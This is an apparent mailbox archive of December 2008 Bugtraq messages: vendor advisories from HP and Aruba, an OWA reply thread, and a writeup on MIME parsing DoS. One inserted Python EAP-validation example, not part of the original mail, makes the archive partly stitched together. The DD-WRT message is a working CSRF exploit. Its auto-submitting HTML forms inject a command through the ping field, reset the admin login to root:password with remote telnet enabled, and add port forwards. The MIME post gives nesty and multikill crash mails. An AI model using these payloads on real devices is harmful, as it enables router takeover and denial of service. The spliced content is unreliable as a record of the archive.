List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12085 invoked from network); 8 Dec 2008 19:05:22 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02390 SSRT071481 rev.1 - HP OpenView Performance Agent, HP Performance Agent, Remote Denial of Service (DoS)
Date: Mon, 08 Dec 2008 11:22:27 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20081208192228.5A318BD82@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01621724
Version: 1

HPSBMA02390 SSRT071481 rev.1 - HP OpenView Performance Agent, HP Performance Agent, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-08
Last Updated: 2008-12-08

Potential Security Impact: Remote Unauthorized Access, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Performance Agent and HP Performance Agent. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Performance Agent vC.04.60 and vC.04.61 and HP Performance Agent vC.04.70 running on AIX, HP-UX, Linux, Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
==============================================
Reference        Base Vector                      Base Score
CVE-2007-4349    (AV:N/AC:M/Au:N/C:N/I:N/A:P)     4.3
==============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP has made patches available to resolve the vulnerabilities.

The patches are available from http://support.openview.hp.com/selfsolve/patches 

Operating System - AIX
Resolved in Patch - PACPTAIX_00001 or subsequent
 
Operating System - HP-UX
Resolved in Patch - PACPTHP_00001 or subsequent
 
Operating System - Linux
Resolved in Patch - PACPTLX_00001 or subsequent
 
Operating System - Solaris
Resolved in Patch - PACPTSOL_00001 or subsequent
 
Operating System - Windows
Resolved in Patch - PACPTNT_00001 or subsequent
 


MANUAL ACTIONS: Yes - NonUpdate 
Install patches listed in the Resolution if running Performance Agent 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa 

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

HP-UX B.11.31
HP-UX B.11.23
HP-UX B.11.11
============
HPOvLcore.HPOVXPL
action: install PACPTHP_00001 or subsequent if running Performance Agent
URL: http://support.openview.hp.com/selfsolve/patches

END AFFECTED VERSIONS (for HP-UX)

HISTORY 
Version:1 (rev.1) - 8 December 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

© Copyright 2008 Hewlett-Packard Development Company, L.P.

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBSTz9ZuAfOvwtKn1ZEQJHbQCgsRqwNUe7pcLQOOtUJ1CyUBG/S2MAoOP/
0U2050mm3sFESQDsrODARBR4
=1Gnh
-----END PGP SIGNATURE-----

From - Mon Dec  8 15:59:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f17
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38863-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id CCE04EC770
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:55:53 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id D7E39143C5B; Mon,  8 Dec 2008 12:00:31 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12787 invoked from network); 8 Dec 2008 19:33:27 -0000
Message-ID: <493D739A.1010404@arubanetworks.com>
Date: Mon, 08 Dec 2008 11:20:58 -0800
From: "Robbie (Rupinder) Gill" <rgill@arubanetworks.com>
User-Agent: Thunderbird 2.0.0.14 (X11/20080501)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: DoS Vulnerability in Aruba Mobility Controller Caused by Malformed
 EAP Frame (Aruba Advisory ID: AID-12808)
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-OriginalArrivalTime: 08 Dec 2008 19:50:12.0669 (UTC) FILETIME=[2F01C6D0:01C9596E]
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Aruba Networks Security Advisory

Title: DoS Vulnerability in Aruba Mobility Controller Caused by
Malformed EAP Frame.

Aruba Advisory ID: AID-12808
Revision: 1.0

For Public Release on 12/8/2008

+----------------------------------------------------

SUMMARY

A Denial of Service (DoS) vulnerability was discovered during standard
bug reporting procedures in the Aruba Mobility Controller. A malformed
EAP frame causes a process crash on the Aruba Mobility Controller,
causing a temporary DoS condition for new clients configured to use EAP
authentication. Prior successful security association is not required
to cause this condition. The Mobility Controller recovers automatically
by restarting the affected process.


AFFECTED ArubaOS VERSIONS

2.4.8.x-FIPS, 2.5.x, 3.1.x, 3.2.x, 3.3.1.x, and 3.3.2.x versions


DETAILS

Extensible Authentication Protocol (EAP) is a framework used for
authentication in wireless and point-to-point connections (RFC 3748).
Aruba Mobility Controller accepts EAP frames on both wireless interfaces
(via its thin APs) and wired interfaces (via devices connected to
untrusted physical ports on the controller). In 802.11 networks, EAP
frames are only used when WPA/WPA2 Enterprise modes are being used.

A malformed EAP frame causes a process crash on the Aruba Mobility
Controller. An attacking station does not need to have completed a
successful security association prior to launching this attack against
the controller.


IMPACT

An attacker can inject a malformed EAP frame and cause a process crash
on the Aruba Mobility Controller. This causes a service outage for new
clients configured to use EAP authentication. The Mobility Controller
recovers automatically by restarting the affected process. An attacker
could however cause a prolonged DoS condition by flooding the Aruba
Mobility Controller with malicious EAP frames.

For wireless, this vulnerability only applies when operating in
WPA/WPA2 Enterprise modes. WPA/WPA2-PSK modes are unaffected by this
vulnerability and so are open/WEP based wireless networks. This
vulnerability does affect wired devices connected to untrusted physical
ports of the Mobility Controller.


CVSS v2 BASE METRIC SCORE: 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)


WORKAROUNDS

Aruba Networks recommends that all customers that are using EAP
authentication apply the appropriate patch(es) as soon as practical.
However, in the event that a patch cannot immediately be applied, the
following steps might help in mitigating the risk:

- - - Aruba Mobility Controllers allow for a mode of operation where a
wireless client's EAP communication terminates on the controller, rather
than on an authentication server (RADIUS server, LDAP server etc.). The
Mobility Controller in turn queries the authentication server on behalf
of the client using non-EAP messages. This mode is referred to as
"EAP-Offload" and is immune to this vulnerability. Enabling this mode on
the Mobility Controller can be used as a workaround until the patch(es)
can be applied. EAP-Offload is not supported for wired client devices.


SOLUTION

Aruba Networks recommends that all customers apply the appropriate
patch(es) as soon as practical. However, in the event that a patch
cannot immediately be applied, the workaround steps will help to
mitigate the risk.

+----------------------------------------------------

OBTAINING FIXED FIRMWARE

Aruba customers can obtain the firmware on the support website:
http://www.arubanetworks.com/support.

Aruba Support contacts are as follows:

1-800-WiFiLAN (1-800-943-4526) (toll free from within North America)

+1-408-754-1200 (toll call from anywhere in the world)

e-mail: support(at)arubanetworks.com

Please, do not contact either "wsirt(at)arubanetworks.com" or
"security(at)arubanetworks.com" for software upgrades.


EXPLOITATION AND PUBLIC ANNOUNCEMENTS

This vulnerability will be announced at

Aruba W.S.I.R.T. Advisory:
http://www.arubanetworks.com/support/alerts/aid-12808.asc

SecurityFocus Bugtraq
http://www.securityfocus.com/archive/1


STATUS OF THIS NOTICE: Final

Although Aruba Networks cannot guarantee the accuracy of all statements
in this advisory, all of the facts have been checked to the best of our
ability. Aruba Networks does not anticipate issuing updated versions of
this advisory unless there is some material change in the facts. Should
there be a significant change in the facts, Aruba Networks may update
this advisory.

A stand-alone copy or paraphrase of the text of this security advisory
that omits the distribution URL in the following section is an uncontrolled
copy, and may lack important information or contain factual errors.


DISTRIBUTION OF THIS ANNOUNCEMENT

This advisory will be posted on Aruba's website at:
http://www.arubanetworks.com/support/alerts/aid-12808.asc


Future updates of this advisory, if any, will be placed on Aruba's worldwide
website, but may or may not be actively announced on mailing lists or
newsgroups. Users concerned about this problem are encouraged to check the
above URL for any updates.


REVISION HISTORY

~      Revision 1.0 / 12-8-2008 / Initial release


ARUBA WSIRT SECURITY PROCEDURES

Complete information on reporting security vulnerabilities in Aruba Networks
products and obtaining assistance with security incidents is available at
~      http://www.arubanetworks.com/support/wsirt.php


For reporting *NEW* Aruba Networks security issues, email can be sent to
wsirt(at)arubanetworks.com or security(at)arubanetworks.com. For sensitive
information we encourage the use of PGP encryption. Our public keys can be
found at
http://www.arubanetworks.com/support/wsirt.php


~      (c) Copyright 2008 by Aruba Networks, Inc.
This advisory may be redistributed freely after the release date given at
the top of the text, provided that redistributed copies are complete and
unmodified, including all date and version information.



-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org

iEYEARECAAYFAkk9c5kACgkQp6KijA4qefU7vACg4RsVQOwBPeGRdcf7/iOmXQTE
RNcAnRvRz7XFOHeOyRCcMFI5FF1synMd
�RT
-----END PGP SIGNATURE-----

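The advisory above describes the failure mode (a malformed EAP frame reaching a process that trusts it) and the amplification (flooding the controller with such frames), but not what a robust receiver does. The following is an added example, not Aruba's code or ArubaOS logic: a strict RFC 3748 header parser that rejects any frame whose Length field disagrees with the bytes actually received, plus a small sliding-window counter that turns repeated malformed frames from one source into a "flood" signal a defender can alert on. The station labels, thresholds and sample frames are constructed for illustration.

```python
import struct
from collections import defaultdict, deque

# RFC 3748 section 4: Code (1 octet), Identifier (1 octet), Length (2 octets,
# network byte order, counting the whole packet), then Data.
EAP_HEADER = struct.Struct("!BBH")
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_CODES = {EAP_REQUEST: "Request", EAP_RESPONSE: "Response",
             EAP_SUCCESS: "Success", EAP_FAILURE: "Failure"}


class MalformedEAP(ValueError):
    """Raised for any frame that must be dropped before it reaches the EAP state machine."""


def parse_eap(frame: bytes) -> dict:
    """Validate an EAP packet and return its fields; never read past the received bytes."""
    if len(frame) < EAP_HEADER.size:
        raise MalformedEAP(f"frame too short for EAP header ({len(frame)} bytes)")
    code, ident, length = EAP_HEADER.unpack_from(frame)
    if code not in EAP_CODES:
        raise MalformedEAP(f"unknown EAP code {code}")
    if length < EAP_HEADER.size:
        raise MalformedEAP(f"length field {length} smaller than the header")
    if length > len(frame):
        # Trusting Length here and reading past the buffer is the classic crash trigger.
        raise MalformedEAP(f"length field {length} exceeds received {len(frame)} bytes")
    data = frame[EAP_HEADER.size:length]  # octets beyond Length are link-layer padding, ignored
    if code in (EAP_SUCCESS, EAP_FAILURE):
        if data:
            raise MalformedEAP("Success/Failure packets must not carry data")
        return {"code": EAP_CODES[code], "id": ident, "type": None, "type_data": b""}
    if not data:
        raise MalformedEAP("Request/Response without a Type octet")
    return {"code": EAP_CODES[code], "id": ident, "type": data[0], "type_data": bytes(data[1:])}


def is_malformed(frame: bytes) -> bool:
    try:
        parse_eap(frame)
    except MalformedEAP:
        return True
    return False


class MalformedFrameMonitor:
    """Counts malformed EAP frames per source in a sliding window to flag a flood.

    Threshold and window are assumed tuning values, not Aruba defaults.
    """

    def __init__(self, threshold: int = 20, window: float = 10.0):
        self.threshold = threshold
        self.window = window
        self._events = defaultdict(deque)  # source -> timestamps of malformed frames

    def observe(self, src: str, frame: bytes, now: float) -> str:
        """Return 'ok', 'malformed', or 'flood' for one received frame."""
        if not is_malformed(frame):
            return "ok"
        q = self._events[src]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        return "flood" if len(q) >= self.threshold else "malformed"


if __name__ == "__main__":
    # Constructed frames: a valid Identity Request, then one whose Length claims
    # 20 bytes although only 5 arrived.
    good = b"\x01\x07\x00\x05\x01"
    bad = b"\x01\x07\x00\x14\x01"
    print(parse_eap(good))
    mon = MalformedFrameMonitor(threshold=3, window=10.0)
    for t in (1.0, 2.0, 3.0):
        print(t, mon.observe("station-A", bad, t))
```

In a real receiver the "flood" state would feed a per-station rate limit or a log line for the SOC; the point of the parser is that every slice is bounded by `len(frame)` first and by the Length field second, so a lying header can only produce an exception, never an out-of-bounds read.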
From - Mon Dec  8 16:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f19
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38862-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id E0B3EEC891
for <lists@securityspace.com>; Mon,  8 Dec 2008 16:09:20 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 8DFD7143C85; Mon,  8 Dec 2008 12:00:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12512 invoked from network); 8 Dec 2008 19:21:54 -0000
X-EDSINT-Source-Ip: 205.142.126.149
From: zdi-disclosures@3com.com
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-08-082: BMC PatrolAgent Version Logging Format String Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OF507B1F01.0DC30233-ON88257519.006BDA86-86257519.006BE620@3com.com>
Sender: Cameron_Hotchkies@3com.com
Date: Mon, 8 Dec 2008 13:38:32 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 12/08/2008 11:38:36 AM,
Serialize complete at 12/08/2008 11:38:36 AM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
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From - Mon Dec  8 17:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f1c
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38864-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8AD31ECB38
for <lists@securityspace.com>; Mon,  8 Dec 2008 17:03:01 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 06713236FA5; Mon,  8 Dec 2008 14:49:58 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 25412 invoked from network); 8 Dec 2008 21:30:57 -0000
Date: Mon, 8 Dec 2008 14:35:28 -0700
Message-Id: <200812082135.mB8LZSuc013034@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: th3.r00k.ieatpork@gmail.pork.com
To: bugtraq@securityfocus.com
Subject: Multiple XSRF in DD-WRT (Remote Root Command Execution)
Status:   

Author: Michael Brooks (!!!!)

I usually don't like posting my leet exploits to bugtraq because it is so unprofessional. You guys usually malform my exploits so they are totally useless,  even to someone trying to write a patch! You also tend to get the wrong name!  Michael Brooks wrote this!

Exploits tested on the newest stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage: http://dd-wrt.com/

Impact:
1) Remote root command execution /bin/sh
2) Change web administration password and enable remote administration
3) Create new Port Forwarding rules to bypass NAT.

<html>
       <head>
               <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
       </head>
       Remote root command execution /bin/sh
       <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
               <input name="submit_button" value="Ping" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="submit_type" value="start" type="hidden">
               <input name="change_action" value="gozila_cgi" type="hidden">
               <input name="next_page" value="Diagnostics.asp" type="hidden">
               <input name="ping_ip" value="echo owned">
               <input name="execute command" type="submit">
       </form><br><br>
       enable remote administration and change login to root:password
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Management" type="hidden">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="commit" value="1" type="hidden">
               <input name="PasswdModify" value="0" type="hidden">
               <input name="remote_mgt_https" value="" type="hidden">
               <input name="http_enable" value="1" type="hidden">
               <input name="info_passwd" value="0" type="hidden">
               <input name="https_enable" value="" type="hidden">
               <input name="http_username" value="root" type="hidden">
               <input name="http_passwd" value="password" type="hidden">
               <input name="http_passwdConfirm" value="password" type="hidden">
               <input name="_http_enable" value="1" type="hidden">
               <input name="refresh_time" value="3" type="hidden">
               <input name="status_auth" value="1" type="hidden">
               <input name="maskmac" value="1" type="hidden">
               <input name="remote_management" value="1" type="hidden">
               <input name="http_wanport" value="8080" type="hidden">
               <input name="remote_mgt_telnet" value="1" type="hidden">
               <input name="telnet_wanport" value="23" type="hidden">
               <input name="boot_wait" value="on" type="hidden">
               <input name="cron_enable" value="1" type="hidden">
               <input name="cron_jobs" value="" type="hidden">
               <input name="loopback_enable" value="1" type="hidden">
               <input name="nas_enable" value="1" type="hidden">
               <input name="resetbutton_enable" value="1" type="hidden">
               <input name="zebra_enable" value="1" type="hidden">
               <input name="ip_conntrack_max" value="512" type="hidden">
               <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
               <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
               <input name="overclocking" value="200" type="hidden">
               <input name="router_style" value="yellow" type="hidden">
               <input name="Remote Admin" type="submit">
       </form><br><br>
       Change Port Forwarding to bypass NAT protection.
       <form method="post" action="http://192.168.1.1/apply.cgi">
               <input name="submit_button" value="Change Port Forwarding" type="submit">
               <input name="action" value="ApplyTake" type="hidden">
               <input name="change_action" value="" type="hidden">
               <input name="submit_type" value="" type="hidden">
               <input name="forward_spec" value="13" type="hidden">
               <input name="name0" value="Hacked" type="hidden">
               <input name="from0" value="4450" type="hidden">
               <input name="pro0" value="both" type="hidden">
               <input name="ip0" value="192.168.1.100" type="hidden">
               <input name="to0" value="445" type="hidden">
               <input name="enable0" value="on" type="hidden">
               <input name="name1" value="Hacked Again" type="hidden">
               <input name="from1" value="22" type="hidden">
               <input name="pro1" value="tcp" type="hidden">
               <input name="ip1" value="192.168.1.101" type="hidden">
               <input name="to1" value="22" type="hidden">
               <input name="enable1" value="on" type="hidden">
       </form>
</html>
<script>
       document.getElementById(1).submit();//remote root command execution!
</script>

From - Mon Dec  8 17:19:20 2008
Date: Mon, 8 Dec 2008 16:50:14 -0500
From: Peter Watkins <peterw@tux.org>
To: Micheal Cottingham <techie.micheal@gmail.com>
Cc: piergiorgio@gigasec.org,
Giuseppe Gottardi <overet@securitydate.it>,
full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Subject: Re: [Full-disclosure] MS OWA 2003 Redirection Vulnerability - [MSRC 7368br]
Message-ID: <20081208165014.A9096@gwyn.tux.org>
In-Reply-To: <fec013240811150836u5f40dbb4g967dc0cac841a276@mail.gmail.com>

On Sat, Nov 15, 2008 at 11:36:26AM -0500, Micheal Cottingham wrote:
> I found and reported this back in 2005/2006. Microsoft told me that it
> had been reported previously and that it would be fixed in the next
> release, which I'm guessing they meant 2007. I do not know if they
> have fixed it in Exchange 2007.

Similarly, a few years ago (Nov/Dec 2005, I believe) I notified Microsoft
about some CSRF flaws in OWA 2003. Sending a message, deleting a message, 
and logging out were all vulnerable. An attacker could trick a victim 
into sending an insult to her bosses (that would show up as an "internal"
message) and removing the message from her Sent Items folder. Clearing the 
deleted items folder, or removing a single message from the deleted items 
folder, did not appear to be vulnerable(!). Microsoft said the flaws were 
fixed in Exchange 2007 but I have no way of verifying that.

-Peter

From - Tue Dec  9 10:49:50 2008
Date: 8 Dec 2008 22:52:17 -0000
Message-ID: <20081208225217.10144.qmail@securityfocus.com>
From: bruhns@recurity-labs.com
To: bugtraq@securityfocus.com
Subject: DoS attacks on MIME-capable software via complex MIME emails

== DoS attacks on MIME-capable software via complex MIME emails ==

== Preface ==

On the phneutral 0x7d8 and RSS 08, I gave short talks on a widely unregarded
problem with MIME software. Due to popular demand, I decided to publish a
short writeup of the talk.

== What is MIME? ==

MIME is the standard format for email messages. One could say MIME is for
email what HTML is for the web. The first RFC for MIME was published in
1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
MIME is a recursive data format. MIME objects consist of a header and a
body, where the content-type field of the header specifies the type of the
body. The body can consist of several separated MIME objects, a single
MIME object, a block of text, an encoded image or about anything specified
in the header. It is possible to read some real-world examples by opening
some emails and hitting "show source".

== Two examples to illustrate MIME ==

The first example is the content-type message/rfc822, which is intended for
forwarding emails. The following body is a complete email, which starts
again with a header, followed by a body. The second example is the
content-type multipart/mixed. A pretty much self-explanatory example is
provided below. The parts of the body are separated by strcat("--",
boundary) and the body must be ended by strcat("--", boundary, "--").

From: <bruhns@hell>
To: <foo@bar>
Subject: example
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="n"

--n
content-type:text/plain

this is some plain text.
--n
content-type:message/rfc822

From: <bruhns@hell>;
Subject: example 2

This is not a MIME-mail, since the mime-version field is missing! However,
most software does not care.
--n--

== The problem ==

Even though MIME is pretty old, many people have not yet learned how to
parse MIME correctly. The problem is that the number of MIME parts of an
email and the depth of recursion is potentially unlimited. Some software,
like the popular rfc2045 library of the courier-mta, solves this problem by
discarding mails with too many MIME parts as a denial of service attack.
This is probably the best approach to handle this problem.

== Proof-of-Concept: Nesty ==

The nesty attack abuses the message/rfc822 type. The following example
crashes a lot of software, which tries to parse it recursively and
therefore overflows its stack:

Content-type: message/rfc822;

Content-type: message/rfc822;

Content-type: message/rfc822;

Content-type: message/rfc822;

... about 200kb. Note that this mail is not compliant with RFC 2045, since
the mime-version field is missing. However, most software does not care and
a lot of it chokes on this mail. In order to attack more RFC-abiding
software (mostly open-source), one can easily adapt the nesty mail to be
compliant. This however increases the size of the mail considerably, which
somehow takes away the elegance of crashing a server with only 200kb.


== Proof-of-Concept: Multikill ==

The multikill attack abuses the multipart/mixed type by creating an overly
large number of MIME parts. Multipart/mixed could be used in a recursive
way, but this is not even needed for this attack. A lot of software freezes
upon the following example:

From: <bruhns@hell>
To: <foo@bar>
Subject: multikill
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="n"


--n

b

--n

... about 800kb or 70000 parts. For a lot of software, about 216 seems to
be the barrier, so you can't craft much more compact multikill attacks.

--n

b

--n--

== Impact ==

Firstly, the attack is DoS only. At this point it seems rather unlikely
that command execution can be crafted on the basis of this problem.
However, the DoS vulnerability exposed by these proof-of-concept mails is
shared by many systems by different vendors and is trivial to exploit. The
ramifications of this attack are therefore not really known yet. There is
still much testing to do.

And at last, there does not only exist a problem with emails with too many
MIME parts, but there exists a whole problem class and a whole class of
attacks, which are insufficiently researched and regarded by now. Of these
attacks, DoS via malformed MIME emails, the nesty and multikill mails are
only the first examples, the tip of the iceberg, so to speak; once software
has been patched to correctly handle these emails, other people will come
up with other examples of malformed emails. To look at this attack even
more broadly, the topic of DoS attacks via overly complex instances of
recursive data types is not researched sufficiently.

== Effects on Outlook Express ==

Outlook freezes on the multikill mail. Outlook starts parsing emails while
downloading them. Upon parsing a multikill mail with more than about 216
parts, some library function goes into an endless loop. Outlook never
finishes downloading the multikill mail; it stays in the mailbox. Outlook
never closes the connection to the mail server, which is not nice to the
mail server. Outlook can only be stopped by killing the process from the
task manager.

To be more exact, the bug seems to reside in InetComm.dll in the
MimeOleClearDirtyTree function. I would guess at a short-integer overflow,
which results in the infinite loop.

Microsoft was informed on 29.07.08 and declined to comment on this issue.

== Effects on virus scanners ==

NOD32 takes several minutes of kernel time to scan the multikill mails. ESET
did not comment on this issue and was informed on 01.08.08.
Kaspersky Internet Security Suite takes several minutes to scan the
multikill mail. Kaspersky was informed on 29.07.08, confirmed the issue and
promised to fix the problem.
Norton Antivirus takes several minutes to scan the multikill mails. Norton
was informed on 01.08.08 and answered promptly and politely.
Norton promised not to fix the problem, since it would not qualify as a
Denial of Service vulnerability.


== Specific Software ==

Vulnerable:
Microsoft Outlook Express 6, Version 6.00.2900.5512
Opera Version: 9.51 Build: 10081 System: Windows XP
Incredimail Build ID: 5853710 Setup ID: 7 Pn: 92977368
Norton Internet Security Version 15.5.0.23
ESet NOD32 2.70.0039.0000
Kaspersky Internet Security 2009; Databases from 23.07.2008

Slightly affected:
Mozilla Thunderbird Version 2.0.14 (20080421)

Not vulnerable:
Avira Antivir Search engine: v8.01.01.11, 17.07.2008
Mutt
Courier

== Correct handling of overly complex messages ==

There exist examples of software which excellently handles overly complex
MIME mails. One is the rfc2045 library of the courier-mta. Quote from
man 3 rfc2045:

The rfcviolation field in the top-level rfc2045 indicates any errors found
while parsing the MIME message. rfcviolation is a bitmask of the following
flags:

[...]
RFC2045_ERR2COMPLEX
    The message has too many MIME sections, this is a potential
    denial-of-service attack.
RFC2045_ERRBADBOUNDARY
    Ambiguous nested multipart MIME boundary strings. (Nested MIME boundary
